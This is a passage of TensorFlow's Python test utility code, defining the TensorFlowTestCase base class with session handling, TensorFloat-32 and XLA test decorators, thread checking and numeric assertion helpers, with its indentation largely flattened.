return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
# The description is just for documentation purposes.
def run_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute test with TensorFloat-32 disabled.
  While almost every real-world deep learning model runs fine with
  TensorFloat-32, many tests use assertAllClose or similar methods, and the
  reduced precision of TensorFloat-32 matmuls typically causes such methods to
  fail with the default tolerances.
Args:
description: A description used for documentation purposes, describing why
the test requires TensorFloat-32 to be disabled.
Returns:
Decorator which runs a test with TensorFloat-32 disabled.
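  Example (illustrative sketch; the matmul comparison below is arbitrary):
  ```python
  class MyPrecisionTest(test_util.TensorFlowTestCase):
    @run_without_tensor_float_32("Compares float32 matmul against numpy")
    def test_matmul_matches_numpy(self):
      a = np.random.rand(8, 8).astype(np.float32)
      b = np.random.rand(8, 8).astype(np.float32)
      self.assertAllClose(math_ops.matmul(a, b), np.matmul(a, b))
  ```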
"""
def decorator(f):
@functools.wraps(f)
def decorated(self, *args, **kwargs):
allowed = config.tensor_float_32_execution_enabled()
try:
config.enable_tensor_float_32_execution(False)
f(self, *args, **kwargs)
finally:
config.enable_tensor_float_32_execution(allowed)
return decorated
return decorator
# The description is just for documentation purposes.
def run_all_without_tensor_float_32(description): # pylint: disable=unused-argument
"""Execute all tests in a class with TensorFloat-32 disabled."""
return for_all_test_methods(run_without_tensor_float_32, description)
def matmul_without_tf32(a, b, *args, **kwargs):
"""Run matmul but cast float32 inputs to float64 if TensorFloat-32 is enabled.
This effectively runs matmul without TensorFloat-32. It should only be used in
tests when verifying some other op or functions works correctly, e.g. to test
`tf.linalg.sqrtm` by matrix multiplying the output of the op by itself. In
such cases, the matmul itself is not being tested so it's OK to run it with
higher precision.
If a matmul itself is being tested, or some other op which uses matmul, use
`run_without_tensor_float_32` instead.
Args:
a: First input to tf.linalg.matmul
b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
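  Example (illustrative sketch; `op_under_test` is a hypothetical op whose
  output, multiplied by itself, should reproduce `x`, e.g. a matrix square
  root):
  ```python
  y = op_under_test(x)
  self.assertAllClose(matmul_without_tf32(y, y), x)
  ```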
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times in a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests from different runs cannot pollute
    each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
  def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
    """Asserts that message is the same as parsed expected_message_maybe_ascii.
    Creates another proto of the same type as `message`, parses the expected
    ASCII form into it, and then compares the two using
    self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
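    Example (illustrative sketch of a test body; the worker function below is
    made up):
    ```python
    def testWorkersRunToCompletion(self):
      results = []
      def worker(value):
        results.append(value * 2)
      threads = [self.checkedThread(target=worker, args=(i,))
                 for i in range(4)]
      for t in threads:
        t.start()
      for t in threads:
        t.join()
      self.assertCountEqual(results, [0, 2, 4, 6])
    ```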
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested
        structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
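    Example (illustrative sketch with made-up nested values):
    ```python
    expected = {"logits": [0.1, 0.2], "state": (np.zeros(2), np.ones(2))}
    actual = {"logits": [0.1 + 1e-8, 0.2], "state": (np.zeros(2), np.ones(2))}
    self.assertAllClose(expected, actual)  # Passes: within default tolerances.
    ```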
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
